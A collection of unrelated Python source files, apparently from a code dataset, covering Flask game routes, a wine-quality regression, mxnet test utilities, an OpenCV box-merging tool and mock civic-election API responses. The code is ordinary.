@app.route("/game/<int:game_id>", methods=['GET'])
@login_required
@not_in_game
def show_game(game_id):
game = Game.query.get_or_404(game_id)
if game.player1_id == current_user.id:
player_number = 1
elif game.player2_id == current_user.id:
player_number = 2
else:
# Spectator
player_number = current_user.id + 100 # simple unique spectator id
return render_template('game.html', game=game, player_number=player_number)
@app.route("/profile/<int:user_id>", methods=['GET'])
@login_required
@not_in_game
def user_profile(user_id):
last_games_limit = 25
finished = Game.game_state['finished']
user = User.get_user_by_id(user_id)
games = user.games.filter(Game.state == finished)\
.filter(Game.player1_id)\
.filter(Game.player2_id)\
.order_by(desc(Game.id)).limit(last_games_limit)
return render_template('profile.html', games=games, user=user)
@app.route("/gamearchive/<int:game_id>", methods=['GET'])
@login_required
@not_in_game
def show_archived_game(game_id):
game = Game.query.get_or_404(game_id)
player_number = current_user.id + 100 # unique spectator id
template = 'archive_game.html'
if game.state != Game.game_state['finished']:
template = 'game.html'
return render_template(template, game=game, player_number=player_number)
@app.route("/game/<int:game_id>/json", methods=['GET'])
def get_game_data(game_id):
game = Game.query.get_or_404(game_id)
players = []
for index, player_name in enumerate((game.player1.username, game.player2.username)):
player = {
'name': player_name,
'player_number': index + 1
}
players.append(player)
moves = list(map(GameMove.dic, game.moves))
return jsonify(moves=moves, players=players)
@login_manager.user_loader
def load_user(userid):
return User.get_user_by_id(userid)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 15 15:49:57 2018
@author: pranavjain
This model predicts the quality of the red wine. Also, an optimal model is built using Backward Elimination.
Required Data to predict
Fixed acidity
Volatile acidity
Citric acid
Residual sugar
Chlorides
Free sulphur dioxide
Total sulphur dioxide
Density
pH
Sulphates
Alcohol
"""
# Importing the libraries
import numpy as np
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('winequality-red.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, 11].values
# Deprecation warnings call for reshaping of single feature arrays with reshape(-1,1)
y = y.reshape(-1,1)
# avoid DataConversionError
y = y.astype(float)
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)
y_test = sc_y.transform(y_test)"""
# Fitting Multiple Linear Regression to the Training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
# Predicting the Test set results
y_pred = regressor.predict(X_test)
# Building the optimal model using Backward Elimination
# consider p-value < 0.05
import statsmodels.formula.api as sm
X = np.append(arr = np.ones((1599, 1)).astype(float), values = X, axis = 1)
X_opt = X[:, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'density'
X_opt = X[:, [0, 1, 2, 3, 4, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'fixed acidity'
X_opt = X[:, [0, 2, 3, 4, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'residual sugar'
X_opt = X[:, [0, 2, 3, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'critic acid'
X_opt = X[:, [0, 2, 5, 6, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# drop 'free sulphur dioxide'
X_opt = X[:, [0, 2, 5, 7, 9, 10, 11]]
regressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()
regressor_OLS.summary()
# hence the optimal model is now ready
|
nilq/baby-python
|
python
|
from mqtt_panel.web.component import Component
class Modal(Component):
def __init__(self):
super().__init__(4)
def _body(self, fh):
self._write_render(fh, '''\
<div id="modal" class="d-none"></div>
''', indent=self._indent)
|
nilq/baby-python
|
python
|
from gym_gazebo2.envs.MARA.mara import MARAEnv
from gym_gazebo2.envs.MARA.mara_random import MARARandEnv
from gym_gazebo2.envs.MARA.mara_real import MARARealEnv
from gym_gazebo2.envs.MARA.mara_camera import MARACameraEnv
from gym_gazebo2.envs.MARA.mara_orient import MARAOrientEnv
from gym_gazebo2.envs.MARA.mara_collision import MARACollisionEnv
from gym_gazebo2.envs.MARA.mara_collision_orient import MARACollisionOrientEnv
|
nilq/baby-python
|
python
|
# Dependencies
import requests as req
from config import api_key
url = f"http://www.omdbapi.com/?apikey={api_key}&t="
# Who was the director of the movie Aliens?
movie = req.get(url + "Aliens").json()
print("The director of Aliens was " + movie["Director"] + ".")
# What was the movie Gladiator rated?
movie = req.get(url + "Gladiator").json()
print("The rating of Gladiator was " + movie["Rated"] + ".")
# What year was 50 First Dates released?
movie = req.get(url + "50 First Dates").json()
print("The movie 50 First Dates was released in " + movie["Year"] + ".")
# Who wrote Moana?
movie = req.get(url + "Moana").json()
print("Moana was written by " + movie["Writer"] + ".")
# What was the plot of the movie Sing?
movie = req.get(url + "Sing").json()
print("The plot of Sing was: '" + movie["Plot"] + "'.")
# BONUS: Complete this activity with a loop.
|
nilq/baby-python
|
python
|
"""Clean Code in Python - Chapter 9: Common Design Patterns
> Monostate Pattern
"""
from log import logger
class SharedAttribute:
def __init__(self, initial_value=None):
self.value = initial_value
self._name = None
def __get__(self, instance, owner):
if instance is None:
return self
if self.value is None:
raise AttributeError(f"{self._name} was never set")
return self.value
def __set__(self, instance, new_value):
self.value = new_value
def __set_name__(self, owner, name):
self._name = name
class GitFetcher:
current_tag = SharedAttribute()
current_branch = SharedAttribute()
def __init__(self, tag, branch=None):
self.current_tag = tag
self.current_branch = branch
def pull(self):
logger.info("pulling from %s", self.current_tag)
return self.current_tag
|
nilq/baby-python
|
python
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# ==============================================================================
import mxnet as mx
from unittest.mock import Mock
import os
import numpy as np
import zipfile
import random
import glob
MXNET_MODEL_ZOO_PATH = 'http://data.mxnet.io/models/imagenet/'
class RepurposerTestUtils:
ERROR_INCORRECT_INPUT = 'Test case assumes incorrect input'
VALIDATE_REPURPOSE_METHOD_NAME = '_validate_before_repurpose'
VALIDATE_PREDICT_METHOD_NAME = '_validate_before_predict'
LAYER_FC1 = 'fc1'
LAYER_RELU = 'relu1'
LAYER_FC2 = 'fc2'
LAYER_SOFTMAX = 'softmax'
ALL_LAYERS = [LAYER_FC1, LAYER_RELU, LAYER_FC2, LAYER_SOFTMAX]
META_MODEL_REPURPOSER_MODEL_HANDLER_CLASS = 'xfer.meta_model_repurposer.ModelHandler'
MNIST_MODEL_PATH_PREFIX = 'tests/data/test_mnist_model'
@staticmethod
def create_mxnet_module():
# Define an mxnet Module with 2 layers
data = mx.sym.Variable('data')
fc1 = mx.sym.FullyConnected(data, name=RepurposerTestUtils.LAYER_FC1, num_hidden=64)
relu1 = mx.sym.Activation(fc1, name=RepurposerTestUtils.LAYER_RELU, act_type="relu")
fc2 = mx.sym.FullyConnected(relu1, name=RepurposerTestUtils.LAYER_FC2, num_hidden=5)
out = mx.sym.SoftmaxOutput(fc2, name=RepurposerTestUtils.LAYER_SOFTMAX)
return mx.mod.Module(out)
@staticmethod
def get_mock_model_handler_object():
mock_model_handler = Mock()
mock_model_handler.layer_names = RepurposerTestUtils.ALL_LAYERS
return mock_model_handler
@staticmethod
def get_image_iterator():
image_list = [[0, 'accordion/image_0001.jpg'], [0, 'accordion/image_0002.jpg'], [1, 'ant/image_0001.jpg'],
[1, 'ant/image_0002.jpg'], [2, 'anchor/image_0001.jpg'], [2, 'anchor/image_0002.jpg']]
return mx.image.ImageIter(2, (3, 224, 224), imglist=image_list, path_root='tests/data/test_images',
label_name='softmax_label')
@staticmethod
def _assert_common_attributes_equal(repurposer1, repurposer2):
assert repurposer1.__dict__.keys() == repurposer2.__dict__.keys()
assert repurposer1._save_source_model_default == repurposer2._save_source_model_default
RepurposerTestUtils.assert_provide_equal(repurposer1.provide_data, repurposer2.provide_data)
RepurposerTestUtils.assert_provide_equal(repurposer1.provide_label, repurposer2.provide_label)
assert repurposer1.get_params() == repurposer2.get_params()
@staticmethod
def assert_provide_equal(provide1, provide2):
if provide1 is None:
assert provide2 is None
return
assert len(provide1) == len(provide2)
assert provide1[0][0] == provide2[0][0]
assert len(provide1[0][1]) == len(provide2[0][1])
@staticmethod
def _remove_files_with_prefix(prefix):
for filename in os.listdir('.'):
if filename.startswith(prefix):
os.remove(filename)
@staticmethod
def download_vgg19():
# Download vgg19 (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'vgg/vgg19-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'vgg/vgg19-symbol.json')]
@staticmethod
def download_squeezenet():
# Download squeezenet (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'squeezenet/squeezenet_v1.1-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'squeezenet/squeezenet_v1.1-symbol.json')]
@staticmethod
def download_resnet():
# Download reset (trained on imagenet)
[mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'resnet/101-layers/resnet-101-0000.params'),
mx.test_utils.download(MXNET_MODEL_ZOO_PATH+'resnet/101-layers/resnet-101-symbol.json')]
@staticmethod
def unzip_mnist_sample():
zip_ref = zipfile.ZipFile('tests/data/mnist_sample.zip', 'r')
zip_ref.extractall('.')
zip_ref.close()
@staticmethod
def create_img_iter(data_dir, batch_size, label_name='softmax_label'):
# assert dir exists
if not os.path.isdir(data_dir):
raise ValueError('Directory not found: {}'.format(data_dir))
# get class names
classes = [x.split('/')[-1] for x in glob.glob(data_dir+'/*')]
classes.sort()
fnames = []
labels = []
for c in classes:
# get all the image filenames and labels
images = glob.glob(data_dir+'/'+c+'/*')
images.sort()
fnames += images
labels += [c]*len(images)
# create imglist for ImageIter
imglist = []
for label, filename in zip(labels, fnames):
imglist.append([int(label), filename])
random.shuffle(imglist)
# make iterators
iterator = mx.image.ImageIter(batch_size, (3, 224, 224), imglist=imglist, label_name=label_name, path_root='')
return iterator
@staticmethod
def get_labels(iterator):
iterator.reset()
labels = []
while True:
try:
labels = labels + iterator.next().label[0].asnumpy().astype(int).tolist()
except StopIteration:
break
return labels
@staticmethod
def assert_feature_indices_equal(expected_feature_indices, actual_feature_indices):
if not type(expected_feature_indices) == type(actual_feature_indices):
raise AssertionError("Incorrect feature_indices type: {}. Expected: {}"
.format(type(actual_feature_indices), type(expected_feature_indices)))
if not expected_feature_indices.keys() == actual_feature_indices.keys():
raise AssertionError("Incorrect keys in feature_indices: {}. Expected: {}"
.format(actual_feature_indices.keys(), expected_feature_indices.keys()))
for key in expected_feature_indices:
if not np.array_equal(expected_feature_indices[key], actual_feature_indices[key]):
raise AssertionError("Incorrect values in feature_indices dictionary")
@staticmethod
def create_mnist_test_iterator():
# Create data iterator for mnist test images
return mx.io.MNISTIter(image='tests/data/t10k-images-idx3-ubyte', label='tests/data/t10k-labels-idx1-ubyte')
|
nilq/baby-python
|
python
|
# Eyetracker type
# EYETRACKER_TYPE = "IS4_Large_Peripheral" # 4C eyetracker
#EYETRACKER_TYPE = "Tobii T120" # Old eyetracker
EYETRACKER_TYPE = "simulation" # test
# EYETRACKER_TYPE = "Tobii Pro X3-120 EPU" # Tobii X3
SCREEN_SIZE_X = 1920
SCREEN_SIZE_Y = 1080
#Pilot condition
PILOT_CONDITION_TEXT_INTERVENTION = True
PILOT_CONDITION_NO_REMOVAL = True
#PILOT_CONDITION_NO_REMOVAL = False
#PILOT mmd subset to load
#PILOT_MMD_SUBSET = [3,9,11,20,27,60,74] #try and ensure 74 is in removal
#PILOT_MMD_SUBSET = [5,28,30,62,66,72,76]
PILOT_MMD_SUBSET = [5]
# Project paths:
# Reference highlighting rules
#RUN USING: python -u experimenter_platform_stage_1_demo.py
if PILOT_CONDITION_TEXT_INTERVENTION:
USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight.db"
else:
USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight.db"
# GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_and_text.db"
if PILOT_CONDITION_TEXT_INTERVENTION:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_and_text_pilot_noremoval.db"
else:
if PILOT_CONDITION_NO_REMOVAL:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_pilot_noremoval_test.db"
else:
GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_pilot_removal.db"
# Project paths:
# Reference highlighting rules - SD testing
#RUN USING: python -u experimenter_platform_study_bars_SD.py
#USER_MODEL_STATE_PATH = "./database/user_model_state_ref_highlight_SD.db"
#GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_ref_highlight_SD_bold1.db"
# Legend highlighting rules
#RUN USING: python -u experimenter_platform_study_1.py
#GAZE_EVENT_RULES_PATH = "./database/gaze_event_rules_legend_highlighting.db"
#USER_MODEL_STATE_PATH = "./database/user_model_state_legend_highlighting.db"
FRONT_END_STATIC_PATH = "./application/frontend/static/"
FRONT_END_TEMPLATE_PATH = "./application/frontend/templates/"
# Platform configuration:
USE_FIXATION_ALGORITHM = True
USE_EMDAT = False
USE_ML = False
USE_KEYBOARD = False
USE_MOUSE = False
# Features to use
USE_PUPIL_FEATURES = True
USE_DISTANCE_FEATURES = True
USE_FIXATION_PATH_FEATURES = True
USE_TRANSITION_AOI_FEATURES = True
# Sets of features to keep
KEEP_TASK_FEATURES = False
KEEP_GLOBAL_FEATURES = False
#Frequency of ML/EMDAT calls:
EMDAT_CALL_PERIOD = 10000
ML_CALL_PERIOD = 6000000
# Some parameter from EMDAT
MAX_SEG_TIMEGAP= 10
# Fixation detector parameters
FIX_MAXDIST = 35
FIX_MINDUR = 100000
REST_PUPIL_SIZE = 0
PUPIL_ADJUSTMENT = "rpscenter"
# The amount of time to wait after starting a new task before starting recording
# fixations (to account for html loading time)
FIX_DETECTION_DELAY = 1000000
#Logs configuration
LOG_PREFIX = "./log/AdaptiveMSNV_log"
# Mouse events
MAX_DOUBLE_CLICK_DUR = 500000
|
nilq/baby-python
|
python
|
#-
# Copyright (c) 2013 Robert M. Norton
# All rights reserved.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
from nose.plugins.attrib import attr
# Register assignment:
# a0 - desired epc 1
# a1 - actual epc 1
# a2 - desired badvaddr 1
# a3 - actual badvaddr 1
# a4 - cause 1
# a5 - desired epc 2
# a6 - actual epc 2
# a7 - desired badvaddr 2
# s0 - actual badvaddr 2
# s1 - cause 2
class test_tlb_addrerr_store(BaseBERITestCase):
@attr('tlb')
def test_epc1(self):
self.assertRegisterEqual(self.MIPS.a0, self.MIPS.a1, "Wrong EPC 1")
@attr('tlb')
def test_badvaddr1(self):
'''Test BadVAddr after load from bad user space address'''
self.assertRegisterEqual(self.MIPS.a2, self.MIPS.a3, "Wrong badaddr 1")
@attr('tlb')
def test_cause1(self):
self.assertRegisterMaskEqual(self.MIPS.a4, 0xff, 0x14, "Wrong cause 1")
@attr('tlb')
def test_epc2(self):
self.assertRegisterEqual(self.MIPS.a5, self.MIPS.a6, "Wrong EPC 2")
@attr('tlb')
def test_badvaddr2(self):
'''Test BadVAddr after load from bad kernel space address'''
self.assertRegisterEqual(self.MIPS.a7, self.MIPS.s0, "Wrong badaddr 2")
@attr('tlb')
def test_cause2(self):
self.assertRegisterMaskEqual(self.MIPS.s1, 0xff, 0x14, "Wrong cause 2")
|
nilq/baby-python
|
python
|
import os
import telebot
token = os.environ['TELEGRAM_TOKEN']
bot = telebot.TeleBot(token)
def medit(message_text,chat_id, message_id,reply_markup=None,parse_mode=None):
return bot.edit_message_text(chat_id=chat_id,message_id=message_id,text=message_text,reply_markup=reply_markup,
parse_mode=parse_mode)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
#
# Tencent is pleased to support the open source community by making QT4C available.
# Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
# QT4C is licensed under the BSD 3-Clause License, except for the third-party components listed below.
# A copy of the BSD 3-Clause License is included in this file.
#
'''QT4C(Client Driver for QTA)
'''
|
nilq/baby-python
|
python
|
from spire.mesh import ModelController
from spire.schema import SchemaDependency
from platoon import resources
from platoon.models import *
class QueueController(ModelController):
resource = resources.Queue
version = (1, 0)
mapping = 'id subject name status'
model = Queue
schema = SchemaDependency('platoon')
def create(self, request, response, subject, data):
session = self.schema.session
subject = self.model.create(session, **data)
session.commit()
response({'id': subject.id})
def update(self, request, response, subject, data):
if not data:
return response({'id': subject.id})
session = self.schema.session
subject.update(session, **data)
session.commit()
response({'id': subject.id})
def _annotate_resource(self, request, model, resource, data):
endpoint = model.endpoint
if endpoint:
resource['endpoint'] = endpoint.extract_dict(exclude='id endpoint_id',
drop_none=True)
|
nilq/baby-python
|
python
|
import argparse
import shutil
import errno
import time
import glob
import os
import cv2
import numpy as np
from merge_tools import do_merge_box
DEBUG = True
class MergeBox(object):
def __init__(self):
args = self.parse_arguments()
self.output_dir = args.output_dir
self.input_dir = args.input_dir
def parse_arguments(self):
"""
Parse the command line arguments of the program.
"""
parser = argparse.ArgumentParser(
description="生成labelme 格式数据"
)
parser.add_argument(
"-o",
"--output_dir",
type=str,
nargs="?",
help="输出文件的本地路径",
required=True
)
parser.add_argument(
"-i",
"--input_dir",
type=str,
nargs="?",
help="输入文件路径",
required=True
)
return parser.parse_args()
def parse_file_list(self, input_dir, output_dir):
"""
"""
label_file_list = glob.glob(os.path.join(input_dir, '*.txt'))
for label_file in label_file_list:
real_name = label_file.split('/')[-1].split('.')[0]
image_file = os.path.join(input_dir, "{}.jpg".format(real_name))
label_image_file = os.path.join(output_dir, "{}.jpg".format(real_name))
print(image_file)
if os.path.exists(image_file):
self.draw_box(label_file, image_file, label_image_file)
def draw_box(self, label_file, image_file, label_image_file):
if not os.path.exists(label_file) or not os.path.exists(image_file):
print('【警告】文件不存在 --------file: {} '.format(label_file))
return
with open(label_file, 'r', encoding='utf-8') as f:
lines = f.readlines()
lines = do_merge_box(lines)
bg_image = cv2.imread(image_file)
raw_image = cv2.imread(image_file)
for index, line in enumerate(lines):
if len(line) < 8:
continue
points = line.split(',')
left = int(points[0]) if int(points[6]) > int(points[0]) else int(points[6])
right = int(points[2]) if int(points[4]) < int(points[2]) else int(points[4])
top = int(points[1]) if int(points[3]) > int(points[1]) else int(points[3])
bottom = int(points[5]) if int(points[7]) < int(points[5]) else int(points[7])
height = bottom - top
width = right - left
colors = (0, 0, 255)
if index == 189:
print(line)
print("left={} right={} top={} bottom={}".format(left, right, top, bottom))
# cv2.fillPoly(bg_image, [pts], (255, 255, 255))
roi_corners=np.array([[(int(points[0]), int(points[1])),
(int(points[2]), int(points[3])),
(int(points[4]), int(points[5])),
(int(points[6]), int(points[7]))]], dtype=np.int32)
mask = np.ones(bg_image.shape, dtype=np.uint8)
channels=bg_image.shape[2]
#输入点的坐标
channel_count=channels
ignore_mask_color = (255,)*channel_count
#创建mask层
cv2.fillPoly(mask, roi_corners, ignore_mask_color)
#为每个像素进行与操作,除mask区域外,全为0
masked_image = cv2.bitwise_and(bg_image, mask)
c_img = masked_image[top: int(top + height), left: int(left + width)]
cv2.imwrite(os.path.join(self.output_dir, '{}.jpg'.format(index)), c_img)
# 画矩形框
pts = np.array([[int(points[0]), int(points[1])],
[int(points[2]), int(points[3])],
[int(points[4]), int(points[5])],
[int(points[6]), int(points[7])]], np.int32) # 每个点都是(x, y)
pts = roi_corners.reshape((-1, 1, 2))
cv2.polylines(bg_image, [pts], True, (0, 0, 255))
# cv2.rectangle(bg_image, (left, top), (left+width, top+height), colors, 1)
cv2.imwrite(label_image_file, bg_image)
print('【输出】生成合格后的图片{} .'.format(label_image_file))
def main(self):
time_start = time.time()
# Argument parsing
args = self.parse_arguments()
if os.path.exists(args.output_dir):
shutil.rmtree(args.output_dir)
try:
os.makedirs(args.output_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.exists(args.input_dir):
print("输入路径不能为空 input_dir[{}] ".format(args.input_dir))
return
self.parse_file_list(args.input_dir, args.output_dir)
time_elapsed = time.time() - time_start
print('The code run {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
if __name__ == "__main__":
mergeBox = MergeBox()
mergeBox.main()
|
nilq/baby-python
|
python
|
"""Tests"""
import unittest
from html_classes_obfuscator import html_classes_obfuscator
class TestsGenerateCSS(unittest.TestCase):
"""Tests
Args:
unittest (unittest.TestCase): Unittest library
"""
def test_generate_css_simple_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello{color:blue}', {"hello": "test_1"})
expected_new_css = '.test_1{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_double_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello .world{color:blue}', {"hello": "test_1", "world": "test_2"})
expected_new_css = '.test_1 .test_2{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_tailwind_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css(r'.lg\:1\/4{color:blue}', {"lg:1/4": "test_1"})
expected_new_css = '.test_1{color:blue}'
self.assertEqual(new_css, expected_new_css)
def test_generate_css_pseudo_elements_case(self) -> None:
"""Test"""
new_css = html_classes_obfuscator.generate_css('.hello .world:not(.not_me, div){color:blue}', {"hello": "test_1", "world": "test_2", "not_me": "test_3"})
expected_new_css = '.test_1 .test_2:not(.test_3, div){color:blue}'
self.assertEqual(new_css, expected_new_css)
|
nilq/baby-python
|
python
|
import urllib.request
def obtain_webpage(url: str):
return urllib.request.urlopen(url)
|
nilq/baby-python
|
python
|
filepath = 'Prometheus_Unbound.txt'
with open(filepath) as fp:
line = fp.readline()
cnt = 1
while line:
print("Line {}: {}".format(cnt, line.strip()))
line = fp.readline()
cnt += 1
|
nilq/baby-python
|
python
|
# Time: O(nlogn)
# Space: O(n)
import collections
# hash, sort
class Solution(object):
def findWinners(self, matches):
"""
:type matches: List[List[int]]
:rtype: List[List[int]]
"""
lose = collections.defaultdict(int)
players_set = set()
for x, y in matches:
lose[y] += 1
players_set.add(x)
players_set.add(y)
return [[x for x in sorted(players_set) if lose[x] == i] for i in xrange(2)]
|
nilq/baby-python
|
python
|
# flake8: noqa
elections_resp = {
'kind': 'civicinfo#electionsQueryResponse',
'elections': [{
'id': '2000',
'name': 'VIP Test Election',
'electionDay': '2021-06-06',
'ocdDivisionId': 'ocd-division/country:us'
}, {
'id': '4803',
'name': 'Los Angeles County Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:ca/county:los_angeles'
}, {
'id': '4804',
'name': 'Oklahoma Special Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:ok'
}, {
'id': '4810',
'name': 'Oregon County Special Elections',
'electionDay': '2019-05-21',
'ocdDivisionId': 'ocd-division/country:us/state:or'
}, {
'id': '4811',
'name': 'Los Angeles County Special Election',
'electionDay': '2019-06-04',
'ocdDivisionId': 'ocd-division/country:us/state:ca/county:los_angeles'
}, {
'id': '4823',
'name': '9th Congressional District Primary Election',
'electionDay': '2019-05-14',
'ocdDivisionId': 'ocd-division/country:us/state:nc/cd:9'
}]
}
voterinfo_resp = {
'kind': 'civicinfo#voterInfoResponse',
'election': {
'id': '2000',
'name': 'VIP Test Election',
'electionDay': '2021-06-06',
'ocdDivisionId': 'ocd-division/country:us'
},
'normalizedInput': {
'line1': '900 North Washtenaw Avenue',
'city': 'Chicago',
'state': 'IL',
'zip': '60622'
},
'pollingLocations': [{
'address': {
'locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'line1': '904 N WASHTENAW AVE',
'city': 'CHICAGO',
'state': 'IL',
'zip': '60622'
},
'notes': '',
'pollingHours': '',
'sources': [{
'name': 'Voting Information Project',
'official': True
}]
}],
'contests': [{
'type': 'General',
'office': 'United States Senator',
'level': ['country'],
'roles': ['legislatorUpperBody'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'James D. "Jim" Oberweis',
'party': 'Republican',
'candidateUrl': 'http://jimoberweis.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/Oberweis2014'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Oberweis2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCOVqW3lh9q9cnk-R2NedLTw'
}]
}, {
'name': 'Richard J. Durbin',
'party': 'Democratic',
'candidateUrl': 'http://www.dickdurbin.com/home',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/dickdurbin'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/DickDurbin'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/SenatorDickDurbin'
}]
}, {
'name': 'Sharon Hansen',
'party': 'Libertarian',
'candidateUrl': 'http://www.sharonhansenforussenate.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/USSenate2014'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/nairotci'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'US House of Representatives - District 7',
'level': ['country'],
'roles': ['legislatorLowerBody'],
'district': {
'name': "Illinois's 7th congressional district",
'scope': 'congressional',
'id': 'ocd-division/country:us/state:il/cd:7'
},
'candidates': [{
'name': 'Danny K. Davis',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/dkdforcongress'
}]
}, {
'name': 'Robert L. Bumpers',
'party': 'Republican'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Governor/ Lieutenant Governor',
'level': ['administrativeArea1'],
'roles': ['headOfGovernment'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Bruce Rauner/ Evelyn Sanguinetti',
'party': 'Republican',
'candidateUrl': 'http://brucerauner.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/BruceRauner'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/BruceRauner'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/117459818564381220425'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/brucerauner'
}]
}, {
'name': 'Chad Grimm/ Alexander Cummings',
'party': 'Libertarian',
'candidateUrl': 'http://www.grimmforliberty.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/grimmforgovernor'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/GrimmForLiberty'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/118063028184706045944'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UC7RjCAp7oAGM8iykNl5aCsQ'
}]
}, {
'name': 'Pat Quinn/ Paul Vallas',
'party': 'Democratic',
'candidateUrl': 'https://www.quinnforillinois.com/00/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/quinnforillinois'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/quinnforil'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/user/QuinnForIllinois'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Comptroller',
'level': ['administrativeArea1'],
'roles': ['governmentOfficer'],
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'candidates': [{
'name': 'Judy Baar Topinka',
'party': 'Republican',
'candidateUrl': 'http://judybaartopinka.com',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/153417423039'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/ElectTopinka'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/118116620949235387993'
}, {
'type': 'YouTube',
'id': 'https://www.youtube.com/channel/UCfbQXLS2yrY1wAJQH2oq4Kg'
}]
}, {
'name': 'Julie Fox',
'party': 'Libertarian',
'candidateUrl': 'http://juliefox2014.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/154063524725251'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/JulieFox1214'
}, {
'type': 'GooglePlus',
'id': 'https://plus.google.com/+Juliefox2014'
}, {
'type': 'YouTube',
